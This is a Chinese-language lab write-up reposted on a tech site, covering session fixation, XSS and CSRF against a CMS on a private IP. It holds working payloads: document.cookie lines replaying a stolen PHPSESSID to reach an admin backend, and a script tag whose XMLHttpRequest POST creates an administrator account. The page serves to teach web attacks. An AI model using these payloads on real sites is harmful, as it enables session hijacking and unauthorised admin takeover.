IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> JavaScript知识库 -> 固定会话与CSRFandXSS -> 正文阅读

[JavaScript知识库]固定会话与CSRFandXSS

1.固定会话

  • 练习xsspt的使用

使用xsspt来生成语句,并将其插入到可能存在XSS漏洞的地方?

?登录后台查看,

cookie已经拿到?

利用获得的cookie登录

document.cookie = 'username=admin';?
document.cookie = 'userid=1';
document.cookie = 'PHPSESSID=qq5cdcqqiucfpde740eoghf1p3';

对url进行修改,即可访问网站后台?

  • 详细描述xss原理图

image.png

?XSS主要使用JavaSript 来完成恶意攻击的行为,JS 可以非常灵活的操纵HTML/CSS/浏览器,这就使得XSS 攻击“想象”空间非常大。
XSS 通过将精心构造的代码(JavaScript)注入到网页中,并由浏览器解释运行这段JS 代码,以达到恶意攻击的效果。当用户访问被XSS 脚本注入过的网页,XSS 脚本就会被提取出来,用户浏览器就会解析执行这段代码,也就是说用户被攻击了。
单从上面的图中可以看出,实现一个XSS攻击至少需要三个角色,服务器端、客服端用户、hacker。

? Hacker对Web Sever提供的服务查找XSS注入点,对其注入点注入恶意代码,如注入的存储型XSS,则回存储在数据内,等待用户触发事件执行。

? 用户访问被注入XSS攻击的网页,则回自动执行之前Hacker注入在服务器中的XSS漏洞指令,而执行的XSS指令,则会对用的cookie、资料等重要信息进行非法获取,甚至冒充用户身份登录网站,

而XSS来带危害很多,包括但不限于(
  • 盗取各种用户账号
  • 窃取用户Cookie 资料,冒充用户身份进入网站
  • 劫持用户会话执行任意操作
  • 刷流量,执行弹窗广告
  • 传播蠕虫病毒

搜索框、登录框、微博、留言板、聊天室等等收集用户输入的地方,都有可能被注入XSS 代码,都存在遭受XSS 的风险,只要用户的输入没有做严格的过滤,就会被XSS 。

?2.CSRF与XSS漏洞结合,创建网站后台管理员账号

  • 能够创建后台管理员账号

首先确认网站后台内没有用户

<script>
xmlhttp = new XMLHttpRequest();
xmlhttp.open("post","http://192.168.40.137/cms/admin/user.action.php",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("act=add&username=Feng&password=root&password2=root&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0");
</script>
Xmlhttp是一种浏览器对象, 可用于模拟http的GET和POST请求
打开,一个post传参,接一个url(此为cms的后台登录界面),false为同步,默认为true(异步)
setRequestHeader方法只是XMLHTTP为添加或修改HTTP头提供的一个接口方法而已, 至于里面的值则是HTTP协议的含义。
XMLHttpRequest.send()方法用于实际发出 HTTP 请求。

?XSS与CSRF结合完成。????

  • 详细描述CSRF漏洞原理图

image.png

CSRF(Cross-site request forgery),中文名称:跨站请求伪造
用户浏览并登录网站A,而网站A则在浏览器生成A的身份凭证Cookie,用户在没有退出A站的情况下,访问B危险网站,则载入恶意代码,向A站发送请求,用户的浏览器则根据B危险网站的代码,期待产生的Cookie的凭证访问A,A不知道本次的请求是用户发出是还是B发出的,但由于是携带用户的Cookie,则A站则根据用户的权限来对请求进行处理。这样B就完成一次CSRF的攻击。
?

  JavaScript知识库 最新文章
ES6的相关知识点
react 函数式组件 & react其他一些总结
Vue基础超详细
前端JS也可以连点成线(Vue中运用 AntVG6)
Vue事件处理的基本使用
Vue后台项目的记录 (一)
前后端分离vue跨域,devServer配置proxy代理
TypeScript
初识vuex
vue项目安装包指令收集
上一篇文章      下一篇文章      查看所有文章
加:2021-10-19 11:47:14  更:2021-10-19 11:48:58 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/23 23:40:47-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码